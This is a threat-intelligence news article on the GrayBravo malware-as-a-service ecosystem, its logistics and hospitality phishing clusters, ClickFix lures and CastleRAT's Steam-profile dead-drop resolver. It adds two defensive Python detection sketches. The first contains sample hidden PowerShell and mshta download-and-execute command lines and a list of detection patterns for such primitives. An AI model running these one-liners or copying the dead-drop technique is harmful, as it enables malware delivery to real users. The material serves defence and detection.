DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)
A sprawling cybercriminal ecosystem continues to expand its reach, launching sophisticated attacks against the global logistics and hospitality sectors. A new threat analysis from Insikt Group (Recorded Future) reveals the rapid evolution of GrayBravo (formerly TAG-150), a threat actor operating a potent Malware-as-a-Service (MaaS) network that empowers distinct criminal clusters with advanced tools like CastleLoader and the newly discovered CastleRAT.
GrayBravo is not acting alone. Instead, it appears to be the architect behind a tiered criminal enterprise. The report identifies four distinct “activity clusters” utilizing GrayBravo’s tooling, each with unique targets and tactics. This structure supports the assessment that the group “runs a malware-as-a-service ecosystem,” providing infrastructure and payloads to affiliates.
“GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure,” the researchers noted.
Cluster 1: Hijacking the Supply Chain
One of the most aggressive clusters, tracked as TAG-160, is laser-focused on the logistics industry. This group impersonates legitimate freight and logistics firms, such as England Logistics, to deceive carriers and drivers.
The attacks often begin with a “dpeforms” lure—fake document signing pages designed to look like legitimate freight rate confirmations. When victims attempt to “sign” the document, they are hit with a “ClickFix” attack: a deceptive pop-up instructing them to copy and paste a malicious PowerShell command to “verify” their identity.
“Cluster 1… impersonates logistics firms and uses both phishing and ClickFix techniques to deliver CastleLoader, spoofing emails and abusing freight-matching platforms,” the report states. By compromising accounts on platforms like DAT Freight & Analytics and Loadlink, the attackers insert themselves directly into the supply chain workflow.
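The ClickFix step described above has a distinctive telemetry shape: the victim pastes a one-liner into the Windows Run dialog, so the interpreter is spawned by explorer.exe and its command line carries download-and-execute primitives. The following detection sketch is an added example (not code from the Recorded Future report or from GrayBravo's tooling); the event field names and the sample process-creation records are constructed for illustration, and the token list is a generic heuristic rather than an indicator set from the report.

```python
"""Flag ClickFix-style process launches in Sysmon-like process-creation records."""
import re

# Constructed sample events (not real telemetry): parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/x"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Interpreters a Run-dialog paste typically lands in.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Download / execute / concealment primitives common to paste-and-run one-liners.
SUSPICIOUS_TOKENS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\b(iex|invoke-expression)\b",
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b",
        r"-(enc|encodedcommand|e)\b",
        r"-w(indowstyle)?\s+hidden",
        r"https?://",
        r"\bmshta\b",
    )
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation record.

    Only interpreters are scored; one point for an explorer.exe parent
    (the Run dialog) and one per suspicious command-line token.
    """
    reasons = []
    if _basename(event["image"]) not in INTERPRETERS:
        return 0, reasons
    if _basename(event["parent"]) == "explorer.exe":
        reasons.append("interpreter spawned from explorer.exe (Run dialog / shell)")
    for pat in SUSPICIOUS_TOKENS:
        if pat.search(event["cmdline"]):
            reasons.append(f"cmdline matches {pat.pattern}")
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=2):
    """Return (event, score, reasons) for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


if __name__ == "__main__":
    for ev, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"[score {score}] {ev['cmdline']}")
        for r in reasons:
            print("   -", r)
```

The threshold keeps a developer running `powershell -File build.ps1` from an editor out of the results while still catching the paste-from-explorer pattern; in production the same logic would also be correlated with the RunMRU registry key, which records what was typed into the Run dialog.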
Cluster 2: The Booking.com “Mailer”
A second cluster, TAG-161, has set its sights on the hospitality sector. This group utilizes specialized “Phishing Email Management Tooling”—custom web panels designed to manage mass email campaigns targeting Booking.com users.
These panels, with names like “Redirect and Email Manager,” allow attackers to automate the creation of redirect links and the distribution of phishing emails at scale. “The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels,” Insikt Group observes.
CastleRAT: Spyware with a Steam Disguise
At the heart of these operations is CastleRAT, a custom remote access trojan capable of stealing credentials, logging keystrokes, and capturing screens. The malware uses a clever evasion technique: Dead Drop Resolvers.
To hide its command-and-control (C2) servers, CastleRAT checks public Steam Community profiles (e.g., steamcommunity[.]com/id/autryjones) for encoded instructions. “The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware,” the report explains.
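A dead-drop resolver leaves a network side effect that the report's description points to: a process that has no business talking to Steam fetches a Steam Community profile page, and a beacon re-fetches the same profile on a schedule. The following hunting sketch is an added example (not code from the report or from CastleRAT); the event schema, the process allowlist and the sample records are constructed, with the profile path taken from the indicator quoted above.

```python
"""Flag dead-drop-resolver lookups: non-Steam processes fetching Steam Community profiles."""
from collections import Counter

# Host the report names as the dead-drop carrier.
DEAD_DROP_HOSTS = {"steamcommunity.com"}

# Processes expected to reach Steam: the client and common browsers (constructed allowlist).
EXPECTED_PROCESSES = {
    "steam.exe", "steamwebhelper.exe", "chrome.exe", "msedge.exe", "firefox.exe",
}

# Constructed sample web/DNS events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Program Files (x86)\Steam\steam.exe",
     "dest": "steamcommunity.com", "url": "/id/somegamer"},
    {"host": "WS-02", "image": r"C:\Users\u\AppData\Roaming\svchost_updater.exe",
     "dest": "steamcommunity.com", "url": "/id/autryjones"},
    {"host": "WS-02", "image": r"C:\Users\u\AppData\Roaming\svchost_updater.exe",
     "dest": "steamcommunity.com", "url": "/id/autryjones"},
    {"host": "WS-03", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest": "steamcommunity.com", "url": "/id/other"},
    {"host": "WS-04", "image": r"C:\Windows\System32\svchost.exe",
     "dest": "update.example.invalid", "url": "/"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def is_dead_drop_lookup(event):
    """True when a process outside the allowlist contacts a dead-drop host."""
    return (event["dest"].lower() in DEAD_DROP_HOSTS
            and _basename(event["image"]) not in EXPECTED_PROCESSES)


def find_dead_drop_lookups(events):
    """Return the suspicious events and a per-(host, process, url) count.

    The count matters because a beacon resolves the same profile repeatedly,
    whereas a user browsing Steam rarely reloads one profile page in a loop.
    """
    hits = [e for e in events if is_dead_drop_lookup(e)]
    counts = Counter((e["host"], _basename(e["image"]), e["url"]) for e in hits)
    return hits, counts


if __name__ == "__main__":
    hits, counts = find_dead_drop_lookups(SAMPLE_EVENTS)
    for (host, image, url), n in counts.most_common():
        print(f"{host}: {image} fetched {url} {n} time(s)")
```

Because browsers legitimately load Steam Community pages, the allowlist is what keeps this hunt usable; a process running out of a user's AppData directory and repeatedly fetching one profile is the pattern worth escalating.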
The “Sparja” Connection
The investigation also unearthed a potential link to a specific threat actor. Researchers connected the infrastructure to a user known as “Sparja” on the underground Exploit Forum.
“Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named ‘Sparja’,” the report reveals. This user was previously observed seeking to buy or rent custom droppers, aligning with the development timeline of CastleLoader.